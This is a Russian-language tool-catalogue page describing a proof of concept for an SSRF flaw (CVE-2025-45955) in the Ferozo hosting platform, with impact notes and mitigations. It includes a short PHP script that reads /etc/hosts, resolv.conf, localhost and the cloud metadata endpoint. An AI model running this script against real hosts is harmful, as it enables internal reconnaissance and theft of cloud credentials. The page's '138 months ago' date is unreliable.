Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/surendrapuppala7/cve-2025-45955
РазведкаАнализ уязвимостейЭксплуатацияСбор информацииВеб-безопасностьБезопасность облачных сред
GitHubsurendrapuppala7/cve-2025-45955

CVE-2025-45955

Доказательство концепции эксплуатации CVE-2025-45955, демонстрирующее подделку серверных запросов (SSRF) в хостинг-платформе DonWeb Ferozo, позволяющее картирование внутренней инфраструктуры и перечисление метаданных облака.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
138 месяцев назадЕщё не проверено

CVE-2025-45955

Подделка серверных запросов (SSRF) в DonWeb Ferozo (CVE-2025-45955)

Description

Атакующий может воспользоваться этой уязвимостью, загрузив и выполнив специально созданный PHP-файл на хостинг-платформе Ferozo. При обращении к файлу запускается серия SSRF-попыток, нацеленных на внутренние сервисы (такие как 127.0.0.1, 169.254.169.254 или эндпоинты сервисной сетки), локальные файлы (например, file:///etc/passwd) и известные эндпоинты облачных метаданных. Скрипт собирает ответы или сообщения об ошибках, что позволяет атакующему составить карту внутренней инфраструктуры, перечислить доступные сервисы и собрать конфиденциальную информацию для дальнейшей эксплуатации.

Доказательство концепции (PoC)

Следующий код демонстрирует уязвимость:

root@kitploit:~
<?php
$targets = [
  "file:///etc/hosts",
  "file:///etc/resolv.conf",
  "http://127.0.0.1/",
  "http://169.254.169.254/latest/meta-data/"
];
foreach ($targets as $url) {
  echo "[*] Trying: $url\n";
  $res = @file_get_contents($url);
  echo $res ? substr($res, 0, 500) : "Request failed or unreadable.\n";
}
?>

Затронутый компонент

  • Хостинг-платформа Ferozo (DonWeb)
  • PHP-среды, допускающие выполнение загруженных пользователем или контролируемых пользователем PHP-файлов

Воздействие

  • Раскрытие информации: утечка внутренних IP-адресов, содержимого файлов, эндпоинтов облачных метаданных
  • Разведка инфраструктуры: позволяет перечислять порты и сервисы (Docker, Kubelet и т. д.)
  • Потенциал эксплуатации облака: проверяет известные эндпоинты метаданных, такие как AWS, GCP и Alibaba
  • Возможность связывания: может сочетаться с другими локальными уязвимостями для RCE или пивотинга

Устранение

  • Ограничьте функции включения файлов и доступа к URL (file_get_contents, fopen и т. д.)
  • Заблокируйте доступ к внутренним IP-диапазонам (127.0.0.0/8, 169.254.169.254 и т. д.) с помощью исходящих правил межсетевого экрана
  • Проводите аудит и очистку пользовательских входных данных, которые могут влиять на пути к файлам или URL

Идентификатор CVE

CVE-2025-45955


Исследователи

Сообщили: [Facundo Fernandez, Jinook Kim, Surendra Puppala / исследователи безопасности | @BYU]

Скачать инструмент